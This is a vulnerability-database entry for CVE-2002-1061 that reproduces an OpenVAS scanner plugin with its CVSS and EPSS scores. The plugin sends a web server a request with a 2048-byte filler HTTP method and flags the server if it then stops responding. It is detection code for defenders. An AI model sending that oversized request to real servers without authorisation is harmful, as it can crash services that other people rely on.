Lucene search
Copyright (C) 2002 Michel ArboiOPENVAS:136141256231011065HistoryNov 03, 2005 - 12:00 a.m.
HTTP Method Overflow DoS Vulnerability
2005-11-0300:00:00
Copyright (C) 2002 Michel Arboi
plugins.openvas.org
24
6.6 Medium
AI Score
Confidence
Low
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.051 Low
EPSS
Percentile
92.8%
It was possible to kill the web server by
sending an invalid request with a too long HTTP method field
# SPDX-FileCopyrightText: 2002 Michel Arboi
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.11065");
script_version("2023-07-21T05:05:22+0000");
script_tag(name:"last_modification", value:"2023-07-21 05:05:22 +0000 (Fri, 21 Jul 2023)");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/5319");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_cve_id("CVE-2002-1061");
script_name("HTTP Method Overflow DoS Vulnerability");
script_category(ACT_DENIAL);
# All the www_too_long_*.nasl scripts were first declared as
# ACT_DESTRUCTIVE_ATTACK, but many web servers are vulnerable to them:
# The web server might be killed by those generic tests before the scanner
# has a chance to perform known attacks for which a patch exists
# As ACT_DENIAL are performed one at a time (not in parallel), this reduces
# the risk of false positives.
script_copyright("Copyright (C) 2002 Michel Arboi");
script_family("Denial of Service");
script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
script_tag(name:"solution", value:"Upgrade your software or protect it with a filtering reverse proxy.");
script_tag(name:"summary", value:"It was possible to kill the web server by
sending an invalid request with a too long HTTP method field");
script_tag(name:"impact", value:"An attacker may exploit this vulnerability to make the web server
crash continually or even execute arbirtray code on the affected system.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"remote_analysis");
exit(0);
}
include("http_func.inc");
include("port_service_func.inc");
port = http_get_port( default:80 );
if( http_is_dead( port:port, retry:4 ) )
exit( 0 );
req = string( crap( data:"HEADVT-TESTVT-TEST", length:2048 ), " / HTTP/1.0\r\n\r\n" );
http_send_recv( port:port, data:req );
if( http_is_dead( port:port ) ) {
security_message( port:port );
exit( 0 );
}
exit( 99 );
References
Related
openvas
openvas
HTTP Version Number Overflow DoS Vulnerability
2005-11-03 00:00:00
HTTP version number overflow
2005-11-03 00:00:00
nessus
nessus
Web Server HTTP Method Handling Remote Overflow
2002-08-06 00:00:00
Web Server HTTP GET Request Version Number Handling Remote Overflow
2002-08-06 00:00:00
cve
cve
CVE-2002-1061
2002-10-04 04:00:00
6.6 Medium
AI Score
Confidence
Low
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.051 Low
EPSS
Percentile
92.8%
Related for OPENVAS:136141256231011065